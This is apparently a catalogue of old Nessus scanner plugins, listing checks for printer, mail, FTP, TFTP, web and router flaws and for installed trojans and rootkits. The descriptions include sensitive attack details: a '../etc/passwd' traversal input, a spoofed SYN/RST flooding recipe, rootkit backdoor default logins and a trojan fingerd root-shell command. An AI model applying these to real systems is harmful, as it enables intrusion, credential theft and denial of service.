| Information gathering | HP JetDirect TCP/IP problems: single thread | checks if anyone can cause a DoS of the printer via the single threaded architecture of the printer | See the ISS Security Advisory of the same name Basically, the older JetDirect interfaces have several problems. One of them is the fact that the HP JetDirect is single-threaded so when one of the ports is occupied, the other ports are unavailable. The consequence of this problem is that the printer can't emulate properly the spooler caracteristics. This can allow a malicious user to prevent other people from printing their work. Risk factor: Low | based on the ISS Security Advisory of the same name |
| Information gathering | HP JetDirect TCP/IP problems: display hack | attempts to write 'Nessus succeeded' on the remote printer LCD | It is sometimes possible to hack the display of a JetDirect printer, thus making write any text. This can be used by attackers in social engineering attack : first, write a 'hotline' phone number on the printer, then make the printer crash (using some well known methods tested by Nessus). This plugin attempts to write 'Nessus succeeded' on the printer display, but it can not check if it succeeds, so you will have to check by yourself. Risk factor: Low | Based on the exploit by Silicosis sili@@l0pht.com |
| Attack | Linux TFTP get file | Attempts to grab a via through a bug in some versions of tftp | There is a faulty access control implementation in some versions of the Linux tftp daemon. Most current tftpd implementations attempt to restrict access to files outside of the tftproot directory. The Linux implementations disallow any files with /../ in their pathnames, however one can still access files such as /etc/passwd by prepending ../ in front of the pathname (../etc/passwd). This will work since the current directory for tftpd is usually /ftpchr Risk factor : high | no copyright |
| Denial of Service | icmp redirect | licensed under the GPL | ||
| Denial of Service | smad | Prevents Sendmail from working properly | Sendmail accepts DoS attack This Linux specific attacks allows anyone to prevent sendmail from working properly In fact the simple algorithm proposed by Michal Zalewski can be performed in this way: 1. Attacker sends SYN from port X to victim, dst_port=25, spoof_addr SPOOFHOST (victim sends SYN/ACK to SPOOFHOST) 2. SPOOFHOST sends RST from port X to victim, dst_port=25 respecting sequence numbers (in reply to the SYN/ACK from victim). (victim got error on accept() - and enters 5 sec 'refusingconn' mode) 3. Wait approx. 2 seconds 4. Go to 1. This attack also works when SPOOFHOST = victim Risk factor : Medium/High | original code by Salvatore Sanfilippo [AntireZ] |
| Information gathering | NetBus | detects if NetBus is running on the remote host | NetBus is a trojan horse designed to take the control of a Win 95/98/NT computer. This plugin detects if it is installed... Risk factor : medium/high | no copyright |
| Information gathering | BackOrifice | detects if BackOrifice is running on the remote host | BackOrifice is a Windows 95/98 Trojan usually listenning on the UDP port 31337, designed to take the control of the infected computer. This plugin determines if BO is running on the ports 31337 and 53. Risk factor : medium/high | no copyright |
| Attack | ftp PASV on connect crashes the FTP server | issues a PASV command upon the connection | Some FTP servers dump core when they are issued a PASV command as soon as the client connects. The FTP server will write a world readable core file which contains portions of the shadowed password file. This flaw allows local users to obtain the shadowed password file. Risk factor: medium/high | no copyright |
| Attack | shell interpreter | determines if there are executables shells in the remote cgi-bin/ | Leaving executable shells in the cgi-bin directory of the remote web server can enable users to execute arbitrary commands on the target machine as the UID of the web server. This check checks for the following shells in your cgi-bin directory : ash bash csh ksh sh tcsh zsh Risk factor : High | no copyright |
| Information gathering | finger redirection check | checks whether the remote finger accepts requests like user@@host1@@target | This plugin attempts to bounce a remote finger request through the target-host finger daemon. A request of the form : user@@host2@@target is made. If your finger daemon allows this kind of request, your host may be used by an attacker as a relay to gather informations about a third-party host. Solution : disable your finger daemon or replace it by a more secure one | no copyright |
| Attack | Netscape FastTrack 'get' | determines if the remote web server dumps the listing of / when issued the 'get' command | When some versions of the Netscape FastTrack server are issued a lower cased 'GET' command, they happily return the file listing of the current directory, rather than displaying the 'index.html' file of the directory. This vulnerability may help the intruders to find out files that are normally hidden. Risk factor : Low/Medium | no copyright |
| Information gathering | finger backdoor check | determines if the remote fingerd is a trojan | A widely ditributed backdoor fingerd is used by script kiddies to maintain their accounts. Basically, this daemon recognizes several commands cmd_adduser cmd_stealth cmd_deluser cmd_rootsh cmd_cleanup Nessus will try the command 'cmd_rootsh' to determine if the remote finger daemon is a trojan If it is a trojan, it means that your system has been compromised, so you will have to double check its config Risk factor: High | no copyright |
| Attack | RootKit | tries to login to the remote system using the default RootKit password | 'RootKit' is the name of a popular set of SunOS utilities that are used by hackers to backdoor a compromised host. This plugin attempts to check if this kit has been installed by trying the default username and password which is root/D13HH[ | no copyright |
| Attack | Hidesource | tries to login to the remote system using the default Hidesource password | 'Hidesource' is the name of a popular set of SunOS utilities that are used by hackers to backdoor a compromised host. This plugin attempts to check if this kit has been installed by trying the default username and password which is wank/wank | no copyright |
| Attack | Hidepak | tries to login to the remote system using the default Hidepak password | 'Hidepak' is the name of a popular set of Solaris utilities that are used by hackers to backdoor a compromised host. This plugin attempts to check if this kit has been installed by trying the default username and password which is wank/wank | no copyright |
| Information gathering | FSP Daemon | Checks if the remote host has a running FSP daemon | This plugin checks whether a host is running an FSP daemon. FSP is a file transfer protocol similar to FTP which uses UDP to transport files. FSP is widely used by attackers to move files from host to host. It is also used widely by software pirates to allow easy access to caches of illicit software. If Nessus discovers that you are running a FSP daemon, you should check for the evidence of break-ins into the remote system Risk Factor: Medium | Based on the code of Wen-King Su (wen-king@@vlsi.cs.caltech.edu) |
| Attack | Solaris Automountd exploit | Checks if automountd is enabled | There is a flaw in the Solaris rpc.statd and automountd which may allow an intruder to execute any command remotely as root. This plugin warns the user that automountd is enabled but **DOESN'T TEST IF THE VULNERABILITYIS PRESENT**. Risk factor : High | written after the advisory of Corruptio Optimi Pessima |
| Attack | mSQL DBname remote exploit | overflows a buffer in the remote msql server | The mysqlInit() function can be passed too long args which will make a buffer overflow which may allow remote users to gain a shell remotely mSQL v1.0.xx -> Vulnerable to the whole possibilities of exploiting (arbitrary commands) and denial of service (debug and dbname). mSQL v2.0.2 and prior -> Vulnerable to the possibility of exploiting (arbitrary commands) and denial of service (debug and dbname). mSQL v2.0.3 and above -> Not vulnerable to the exploiting vulnerability (arbitrary commands) but it's still vulnerable to Denial of Service (debug and dbname). Risk factor : Medium/High | Sekure SDI Secure Coding Team |
| Attack | mSQL debug remote exploit | overflows a buffer in the remote msql server set to debug mode | An attacker may use mSQL to gain a shell remotely when the environment variable MSQL_DEBUG (for version 2.0) or MINERVA_DEBUG (for version 1.0) is set. mSQL v1.0.xx -> Vulnerable to the whole possibilities of exploiting (arbitrary commands) and denial of service (debug and dbname). mSQL v2.0.2 and prior -> Vulnerable to the possibility of exploiting (arbitrary commands) and denial of service (debug and dbname). mSQL v2.0.3 and above -> Not vulnerable to the exploiting vulnerability (arbitrary commands) but it's still vulnerable to Denial of Service (debug and dbname). Risk factor : Medium/High | Sekure SDI Secure Coding Team |
| Information gathering | Sendmail redirection attack | check if specific message routing can be performed | Due to strange address parsing policy [briefly: if address ends with local hostname, trim it and parse as any other (even if after this operation address isn't 'local' anymore], specific message routing (eg. through internal, protected or external networks) can be forced, giving an occasion to perform anonymous scanning (or fakemailing). You could call it 'feature' instead of 'bug', but it seems to be Sendmail-specific ;> Simple fix - in /etc/sendmail.cf, at the top of ruleset 98, insert following line: R$*@@$*@@$* $#error $@@ 5.7.1 $: "551 Sorry, no redirections.\ Risk factor : Low/Medium | Michal Zalewski |
| Attack | Microsoft Personnal Web Server '.....' | Attempts to get the root listing of the remote web server | It is possible to list and download any file on a remote windows 95 host that has MS PWS installed by requesting '......' which will list the root directory Risk factor : high | discovered by Sean Coates |
| Denial of Service | Lotus Notes MTA dos | makes the Lotus MTA crash | It is possible to crash the Lotus Notes MTA by sending it two HELO commands, both on the Solaris and Windows platform. An attacker can prevent the incoming mail from being delivered. Risk factor : Medium/High | found by Siva Sankar Adiraju |
| Denial of Service | IIS ftp server crash | crashes an IIS ftp server | It is possible to make the IIS FTP server close all the active connections by issuing a too long NLST command which will make the FTP server crash An attacker can use this to prevent people from downloading anything from your FTP server Risk factor: medium | no copyright |
| Denial of Service | oshare | crashes a Win98 computer | It is possible to crash a Windows 98 computer by sending it a badly formed packet. This plugin implements the oshare attack, the details of which can be found in the BugTraq archive Risk factor : High | original code by R00t Zer0 |
| Attack | ExAir possible DoS | determines the presence of some ExAir scripts | This plugin is for those that have Internet Information Server 4 installed with the IIS sample site "ExAir\ There are three Active Server Pages that, if called directly without the default ExAir page and associated dlls ever having been loaded into the IIS memory space, will hang and eventually time out after 90 secs - the default script timeout period. Whilst in this state, processor usage increases to 100% and the server becomes very sluggish. This plugin does not perform this denial of service attack Risk factor : High | mnemonix |
| Attack | Perl.exe and IIS security | attempts to find the location of the remote web root | There is a problem with perl.exe similar to the issue discussed in KB article Q193689 where the physical disk location of a virtual web directory can be ascertained. In all versions of IIS, where a website has been configured to interpret perl scripts using the perl executable (perl.exe), a problem exists where arequest for a non-existent file will return the physical location on a disk of a web directory. This may be of some interest to attackers who gain more knowledge about the attacked target Risk factor : Low | mnemonix |
| Attack | IIS /scripts directory browsable | checks whether the remote /scripts/ directory is browseable | This plugin checks whether the remote server /scripts directory is browsable or not. A browsable scripts directory will allow an attacker to search for potentially vulnerable scripts more efficiently, and to test your home made scripts too Risk factor : Medium | distributed under the GPL |
| Attack | slmail HELO buffer overflow | buffer overflow for the SLMail SMTP server | The SLMail service listens on several ports, one of which is 27 which provided SMTP services in addition to port 25. On this port, issuing an HELO command with an argument longer than 855 chars will make a buffer overflow which may allow an attacker to execute arbitrary code on the remote host. Risk factor : High | no copyright |
| Denial of Service | slmail:27 VRFY overflow | buffer overflow for the SLMail SMTP server | The SLMail service listens on several ports, one of which is 27 which provided SMTP services in addition to port 25. On this port, issuing an VRFY command with an argument longer than 855 chars will make the remote server crash Risk factor : High | no copyright |
| Denial of Service | Router Access Port DoS | performs a denial of service against the remote router | It is possible to disable the TCP access / configuration ports on most routers by sending a shoving a few thousand bytes of any character down the connection to ports 23, 2001, 4001, 6001 and 9001. Some routers have to be reset manually while some others will need from 30 seconds to several days to recover. An attacker can use this weakness to bring down a part or even your whole network. Risk factor : High | HD Moore |
| Attack | unfsd bug | Attempts to guess the file handle of the remote root fs | There is a security problem in unfsd version 2.0 and earlier which allows an attacker to guess the file handle of the root filesystem by trying reasonable combinations of device and inode number in succession and attempting to get its attribute handle from the server. If this is successful, this means that an attacker may mount your exported filesystems easily. Risk factor : High | 0. Kirch |
| Information gathering | Sendmail Relaying | checks whether sendmail can do relaying | This plugin determines whether your sendmail server can be used as a mail relay. If it can, then it may be subject to spammers who can then relay their mails Mail relaying is bad because it overloads your server since the spammers usually send thousands of mails. Risk factor : low | no copyright |
| Information gathering | TCP Chorusing | bug described by Dan Kaminsky |